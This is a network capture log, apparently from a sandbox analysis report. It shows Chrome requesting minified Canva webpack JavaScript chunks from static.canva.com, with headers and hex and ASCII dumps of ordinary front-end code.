                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 75 61 72 65 22 3d 3d 3d 6c 7d 29 2c 2e 2e 2e 6d 2c 63 68 69 6c 64 72 65 6e 3a 61 37 28 22 73 76 67 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 68 2c 73 74 79 6c 65 3a 6b 2c 63 68 69 6c 64 72 65 6e 3a 5b 70 2c 0a 6e 2c 58 36 28 22 74 65 78 74 22 2c 7b 78 3a 22 35 30 25 22 2c 79 3a 22 35 30 25 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 74 65 78 74 41 6e 63 68 6f 72 3a 22 6d 69 64 64 6c 65 22 2c 66 69 6c 6c 3a 50 7a 62 28 61 29 2c 66 6f 6e 74 57 65 69 67 68 74 3a 22 35 30 30 22 2c 66 6f 6e 74 53 69 7a 65 3a 22 35 30 25 22 2c 63 68 69 6c 64 72 65 6e 3a 58 36 28 22 74 73 70 61 6e 22 2c 7b 64 79 3a 22 30 2e 33 36 65 6d 22 2c 6c 65 74 74 65 72 53 70 61 63 69 6e 67 3a 22 30 2e 30 31 72 65 6d 22 2c 63 68 69 6c 64 72 65 6e 3a 51 7a 62 28 62 29
                                                                                                                                                                                                                                                    Data Ascii: uare"===l}),...m,children:a7("svg",{className:h,style:k,children:[p,n,X6("text",{x:"50%",y:"50%","aria-hidden":"true",textAnchor:"middle",fill:Pzb(a),fontWeight:"500",fontSize:"50%",children:X6("tspan",{dy:"0.36em",letterSpacing:"0.01rem",children:Qzb(b)
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 46 72 61 6d 65 3a 63 2c 6d 70 61 3a 64 2c 61 72 69 61 4c 69 76 65 3a 67 2c 54 65 61 3a 65 2c 67 67 61 3a 66 2c 49 6a 61 3a 68 2c 56 74 61 3a 61 3f 4a 41 62 3a 30 2c 79 79 61 3a 59 36 28 7b 5f 34 43 31 76 49 41 3a 61 2c 70 4f 6c 6c 36 51 3a 22 6e 6f 6e 65 22 3d 3d 3d 6b 2c 67 31 54 35 70 51 3a 22 6c 61 79 6f 75 74 22 3d 3d 3d 6b 7d 29 2c 42 4d 61 3a 4b 41 62 7d 29 7d 29 3b 76 61 72 20 4d 41 62 3d 27 3c 73 76 67 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 39 2e 32 35 20 33 2e 35 61 2e 37
                                                                                                                                                                                                                                                    Data Ascii: Frame:c,mpa:d,ariaLive:g,Tea:e,gga:f,Ija:h,Vta:a?JAb:0,yya:Y6({_4C1vIA:a,pOll6Q:"none"===k,g1T5pQ:"layout"===k}),BMa:KAb})});var MAb='<svg viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M9.25 3.5a.7


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    31192.168.2.449774104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC787OUTGET /web/43ddbdb7757e7317.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1221INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:29 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 411
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a1c1b194228-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 761160
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "cda459f2f4321c68cea3296f0945c472"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:15 GMT
                                                                                                                                                                                                                                                    Last-Modified: Wed, 11 Dec 2024 01:49:54 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 12 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: WVjx+Cd1gfSAWwE1ghE/dZeDURNsll1jSn7UbTqfO7fpls1JuD7ZFY5xCvMsZiLbu9OOD9uAh8FzG7W85AZioxaKv4ynUKg/ZRhIegYPY1I=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: TT4QSEPDJZEKTY8W
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: Ck0IotSh_5YQTu5YWsI8kTwKxqKgARF5
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC354INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 5a 5a 66 62 25 32 46 61 67 31 31 69 55 79 33 55 34 50 4f 79 74 49 74 73 25 32 42 58 41 4a 4b 57 36 70 49 34 35 7a 66 48 47 45 32 49 30 77 70 32 77 6e 58 52 74 70 30 6c 36 6b 42 77 42 4e 73 4d 39 78 71 68 34 70 6b 43 77 48 77 6a 45 45 56 25 32 46 43 43 4f 48 6d 68 6e 6a 66 66 25 32 42 75 50 52 77 67 52 74 54 7a 52 78 62 63 59 34 61 25 32 42 6a 6e 6c 30 6e 44 53 37 48 6f 56 61 76 4e 44 4c 4b 6f 72 46 77 32 4c 44 51 69 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZZfb%2Fag11iUy3U4POytIts%2BXAJKW6pI45zfHGE2I0wp2wnXRtp0l6kBwBNsM9xqh4pkCwHwjEEV%2FCCOHmhnjff%2BuPRwgRtTzRxbcY4a%2Bjnl0nDS7HoVavNDLKorFw2LDQig%3D"}],"group":"cf-nel","max_age":60
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC411INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 36 32 30 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 36 38 38 31 36 35 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 66
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[7620],{/***/ 688165:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._f


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    32192.168.2.449775104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC615OUTGET /web/0cda863f2baa0d46.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 17275
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a1c3c107cf9-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71058
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "d413ebca508b7b61807ee983a30203d3"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:15 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:32 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: JtYo5Rba1A0391rGziyaguY5mImzf+SDGi7OL9zEa3fpHn08Cp68xzcRwnYMWVu7R5vWKbEuL9o=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYH8VN48G3M95DX
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: kSK3EsqBOvtxco.0d0uCns7Fv7vWKIHu
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 58 44 65 42 6b 55 48 54 46 64 71 54 34 6e 78 74 4b 30 74 33 70 36 50 59 54 53 6c 76 72 54 44 6a 74 33 37 56 57 35 36 6b 77 77 63 7a 6c 76 61 6a 69 4d 74 76 67 46 6b 25 32 42 52 79 69 54 69 46 71 6c 48 41 70 6f 45 70 57 54 4b 50 6b 6b 59 69 6d 73 37 6d 6c 68 56 75 6e 4d 67 35 58 4e 34 69 25 32 42 75 65 37 4b 68 4e 6a 58 58 56 30 39 4b 47 25 32 46 70 6f 25 32 42 54 6b 6c 77 55 46 46 4c 4c 31 35 44 38 71 6b 32 72 6b 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XDeBkUHTFdqT4nxtK0t3p6PYTSlvrTDjt37VW56kwwczlvajiMtvgFk%2BRyiTiFqlHApoEpWTKPkkYims7mlhVunMg5XN4i%2Bue7KhNjXXV09KG%2Fpo%2BTklwUFFLL15D8qk2rk%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1196INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 33 39 35 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 38 34 34 35 37 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[2395],{/***/ 284457:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 63 2c 63 72 6f 73 73 5f 64 6f 6d 61 69 6e 3a 21 30 2c 73 68 6f 77 5f 6c 6f 67 3a 61 2e 5a 45 61 2c 73 65 6e 64 5f 74 79 70 65 3a 64 3f 22 62 65 61 63 6f 6e 22 3a 22 61 6a 61 78 22 2c 70 72 65 73 65 74 5f 70 72 6f 70 65 72 74 69 65 73 3a 7b 6c 61 74 65 73 74 5f 72 65 66 65 72 72 65 72 5f 68 6f 73 74 3a 21 30 2c 75 72 6c 3a 21 31 7d 7d 7d 3b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6d 65 28 37 31 36 32 37 30 29 2e 74 68 65 6e 28 28 29 3d 3e 7b 65 28 5f 5f 63 2e 41 28 61 2e 67 6c 6f 62 61 6c 2e 73 61 29 29 7d 29 2e 63 61 74 63 68 28 28 29 3d 3e 7b 65 28 76 6f 69 64 20 30 29 7d 29 7d 29 3b 61 2e 48 39 2e 74 68 65 6e 28 65 3d 3e 7b 76 61 72 20 66 3b 6e 75 6c 6c 3d 3d 3d 65 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 6e 75 6c
                                                                                                                                                                                                                                                    Data Ascii: c,cross_domain:!0,show_log:a.ZEa,send_type:d?"beacon":"ajax",preset_properties:{latest_referrer_host:!0,url:!1}}};__webpack_require__.me(716270).then(()=>{e(__c.A(a.global.sa))}).catch(()=>{e(void 0)})});a.H9.then(e=>{var f;null===e||void 0===e?void 0:nul
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 28 5b 22 61 6e 61 6c 79 74 69 63 73 5f 65 76 65 6e 74 5f 76 32 22 5d 2c 22 72 65 61 64 77 72 69 74 65 22 29 3b 63 6f 6e 73 74 20 63 3d 61 2e 6f 62 6a 65 63 74 53 74 6f 72 65 28 22 61 6e 61 6c 79 74 69 63 73 5f 65 76 65 6e 74 5f 76 32 22 29 2c 64 3d 5b 63 2e 69 6e 64 65 78 28 22 75 73 65 72 5f 69 64 5f 69 6e 64 65 78 22 29 2e 67 65 74 41 6c 6c 28 6e 75 6c 6c 21 3d 3d 62 26 26 76 6f 69 64 20 30 21 3d 3d 62 3f 62 3a 22 6e 75 6c 6c 22 29 5d 3b 62 26 26 64 2e 70 75 73 68 28 63 2e 69 6e 64 65 78 28 22 75 73 65 72 5f 69 64 5f 69 6e 64 65 78 22 29 2e 67 65 74 41 6c 6c 28 22 6e 75 6c 6c 22 29 29 3b 62 3d 28 62 3d 28 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 64 29 29 2e 66 6c 61 74 28 29 29 3f 62 2e 6d 61 70 28 65 3d 3e 78 31 2e 52 61 28 65 2e 65 76 65
                                                                                                                                                                                                                                                    Data Ascii: (["analytics_event_v2"],"readwrite");const c=a.objectStore("analytics_event_v2"),d=[c.index("user_id_index").getAll(null!==b&&void 0!==b?b:"null")];b&&d.push(c.index("user_id_index").getAll("null"));b=(b=(await Promise.all(d)).flat())?b.map(e=>x1.Ra(e.eve
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 74 68 2e 72 61 6e 64 6f 6d 28 29 29 3b 61 77 61 69 74 20 5f 5f 63 2e 4f 72 28 28 29 3d 3e 62 28 66 2c 65 29 2c 35 45 33 29 2e 72 65 73 75 6c 74 3b 5f 5f 63 2e 4f 72 28 61 73 79 6e 63 28 29 3d 3e 7b 61 77 61 69 74 20 63 2e 70 75 74 28 65 2c 7b 58 37 3a 66 2c 52 33 3a 44 61 74 65 2e 6e 6f 77 28 29 2b 0a 31 31 45 33 7d 29 7d 2c 31 45 33 29 7d 7d 2c 51 64 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 6e 61 76 69 67 61 74 6f 72 2e 6c 6f 63 6b 73 2c 62 3d 4e 64 62 3b 72 65 74 75 72 6e 20 63 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 64 3d 3e 7b 61 2e 72 65 71 75 65 73 74 28 62 28 63 29 2c 28 29 3d 3e 7b 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 29 3d 3e 7b 7d 29 7d 29 7d 29 7d 2c 52 64 62 3d 66 75 6e 63 74 69 6f 6e 28 61
                                                                                                                                                                                                                                                    Data Ascii: th.random());await __c.Or(()=>b(f,e),5E3).result;__c.Or(async()=>{await c.put(e,{X7:f,R3:Date.now()+11E3})},1E3)}},Qdb=function(){var a=navigator.locks,b=Ndb;return c=>new Promise(d=>{a.request(b(c),()=>{d();return new Promise(()=>{})})})},Rdb=function(a
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 6c 62 61 63 6b 5f 64 69 73 70 61 74 63 68 65 72 5f 75 73 65 64 22 29 2c 61 2e 53 67 61 2e 64 69 73 70 61 74 63 68 28 62 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 3f 76 6f 69 64 20 30 3a 63 2e 50 68 28 22 66 61 6c 6c 62 61 63 6b 5f 64 69 73 70 61 74 63 68 65 72 5f 75 73 65 64 22 29 2c 61 2e 53 67 61 2e 64 69 73 70 61 74 63 68 28 62 29 7d 7d 2c 57 64 62 3d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 3d 28 6e 65 77 20 44 61 74 65 28 61 2e 54 61 2e 6e 6f 77 28 29 29 29 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 2c 64 3d 6e 65 77 20 42 64 62 28 7b 65 76 65 6e 74 73 3a 62 2e 6d 61 70 28 65 3d 3e 7b 61 3a 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61
                                                                                                                                                                                                                                                    Data Ascii: lback_dispatcher_used"),a.Sga.dispatch(b)}catch(e){return null===c||void 0===c?void 0:c.Ph("fallback_dispatcher_used"),a.Sga.dispatch(b)}},Wdb=async function(a,b){const c=(new Date(a.Ta.now())).toISOString(),d=new Bdb({events:b.map(e=>{a:switch(e.type){ca
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 64 3a 41 31 28 62 2e 55 42 61 29 2c 0a 67 74 6d 5f 62 65 6e 5f 36 30 35 3a 41 31 28 62 2e 51 42 61 29 2c 67 74 6d 5f 64 69 63 62 6f 3a 41 31 28 62 2e 52 42 61 29 2c 67 74 6d 5f 66 70 63 5f 72 74 69 64 3a 41 31 28 62 2e 54 42 61 29 2c 67 74 6d 5f 6d 65 74 61 64 61 74 61 3a 41 31 28 62 2e 56 42 61 29 7d 7d 29 7d 2c 62 65 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 59 64 2c 63 3d 61 2e 4c 70 2c 64 2c 65 2c 66 3b 76 61 72 20 67 3d 7b 61 70 70 5f 6e 61 6d 65 3a 6e 75 6c 6c 3d 3d 3d 28 64 3d 63 2e 61 70 70 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 6e 61 6d 65 2c 70 72 6f 64 75 63 74 5f 76 61 72 69 61 6e 74 3a 6e 75 6c 6c 3d 3d 3d 28 65 3d 63 2e 61 70 70 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30
                                                                                                                                                                                                                                                    Data Ascii: d:A1(b.UBa),gtm_ben_605:A1(b.QBa),gtm_dicbo:A1(b.RBa),gtm_fpc_rtid:A1(b.TBa),gtm_metadata:A1(b.VBa)}})},beb=function(a){var b=a.Yd,c=a.Lp,d,e,f;var g={app_name:null===(d=c.app)||void 0===d?void 0:d.name,product_variant:null===(e=c.app)||void 0===e?void 0
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 73 74 61 74 75 73 29 3b 7d 72 65 74 75 72 6e 7b 6e 65 74 77 6f 72 6b 3a 7b 73 74 61 74 75 73 3a 61 7d 7d 7d 72 65 74 75 72 6e 7b 7d 7d 3b 5f 5f 63 2e 67 50 2e 70 72 6f 74 6f 74 79 70 65 2e 4c 5a 3d 5f 5f 63 2e 4e 59 28 33 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 3d 74 68 69 73 2e 4b 5a 28 61 2c 62 29 3b 72 65 74 75 72 6e 28 64 2c 65 29 3d 3e 63 28 76 6f 69 64 20 30 2c 64 2c 65 29 7d 29 3b 0a 5f 5f 63 2e 6c 50 2e 70 72 6f 74 6f 74 79 70 65 2e 4c 5a 3d 5f 5f 63 2e 4e 59 28 32 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 3d 77 64 62 28 74 68 69 73 2c 61 2c 62 29 3b 72 65 74 75 72 6e 28 64 2c 65 29 3d 3e 63 28 76 6f 69 64 20 30 2c 64 2c 65 29 7d 29 3b 5f 5f
                                                                                                                                                                                                                                                    Data Ascii: oid 0===d?void 0:d.status);}return{network:{status:a}}}return{}};__c.gP.prototype.LZ=__c.NY(3,function(a,b){const c=this.KZ(a,b);return(d,e)=>c(void 0,d,e)});__c.lP.prototype.LZ=__c.NY(2,function(a,b){const c=wdb(this,a,b);return(d,e)=>c(void 0,d,e)});__
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 72 65 73 65 74 28 29 3b 72 65 74 75 72 6e 20 62 7d 63 61 74 63 68 28 62 29 7b 74 68 72 6f 77 20 74 68 69 73 2e 53 33 2b 2b 2c 74 68 69 73 2e 53 6a 61 3d 74 68 69 73 2e 54 61 2e 6e 6f 77 28 29 2c 74 68 69 73 2e 53 33 3e 3d 74 68 69 73 2e 4c 7a 61 26 26 28 74 68 69 73 2e 73 74 61 74 65 3d 31 29 2c 62 3b 7d 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 54 61 3d 0a 5f 5f 63 2e 70 61 3b 74 68 69 73 2e 53 6a 61 3d 74 68 69 73 2e 53 33 3d 74 68 69 73 2e 73 74 61 74 65 3d 30 3b 74 68 69 73 2e 61 63 74 69 6f 6e 3d 61 3b 74 68 69 73 2e 4c 7a 61 3d 33 3b 74 68 69 73 2e 65 4a 61 3d 33 45 34 7d 7d 3b 76 61 72 20 46 64 62 3d 32 2c 45 64 62 3d 34 2c 47 64 62 3d 38 3b 76 61 72 20 6b 65 62 3d 63 6c 61 73 73 7b 73 74 61 74 69 63 20 6f 70 65 6e 28 61 29 7b
                                                                                                                                                                                                                                                    Data Ascii: reset();return b}catch(b){throw this.S3++,this.Sja=this.Ta.now(),this.S3>=this.Lza&&(this.state=1),b;}}constructor(a){this.Ta=__c.pa;this.Sja=this.S3=this.state=0;this.action=a;this.Lza=3;this.eJa=3E4}};var Fdb=2,Edb=4,Gdb=8;var keb=class{static open(a){
